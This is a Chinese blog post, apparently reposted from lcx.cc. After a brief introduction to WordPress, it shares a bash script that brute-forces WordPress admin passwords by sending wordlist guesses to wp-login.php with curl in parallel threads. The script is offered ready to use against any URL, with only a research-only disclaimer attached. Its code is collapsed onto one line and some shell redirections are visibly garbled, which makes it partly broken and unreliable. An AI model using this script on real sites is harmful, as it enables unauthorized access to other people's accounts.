WordPress是一种使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL 数据库的服务器上架设自己的网志。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。WordPress 是一个免费的开源项目,在GNU通用公共许可证下授权发布。
目前最新版本为4.0版。 WordPress 被认为是Michel Valdrighi所开发的网志平台b2/cafelog的正式继承者。
“WordPress”这个名字出自 Christine Selleck 的主意,他是主要开发者Matt Mullenweg的朋友。
本次给大家带来WordPress后台密码暴力破解程序,请先确认机器已安装curl。
#!/bin/bash #by leo108 #使用方式:./wp-pwd.sh 用户名 字典 登录页面 线程数 #例如: ./wp-pwd.sh leo 1.txt http://xxx.com/wp-login.php 15 user=$1 zidian=$2 url=$3 thread=$4 function guess { curl -s -d "log=$user&pwd=$1" $url >> $1.html l=$(wc -l $1.html| awk -F[:" "]+ '{print $1}') if [ 0 -eq $l ]; then echo $1 >> pwd.txt rm $1.html return 1 else rm $1.html return 0 fi } if [ -e pwd.txt ]; then rm pwd.txt fi tmp_fifofile="/tmp/$$.fifo" mkfifo $tmp_fifofile exec 6$tmp_fifofile rm $tmp_fifofile for ((i=0;i&6 while read line;do if [ -e pwd.txt ]; then break fi read -u6 { echo "Testing "$line guess $line echo >&6 } & done &- if [ -e pwd.txt ]; then echo "Password is " cat pwd.txt rm pwd.txt else echo "Not Found" fi exit 0
留言评论(旧系统):
文章来源于lcx.cc:分享一个WordPress后台密码暴力破解脚本
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论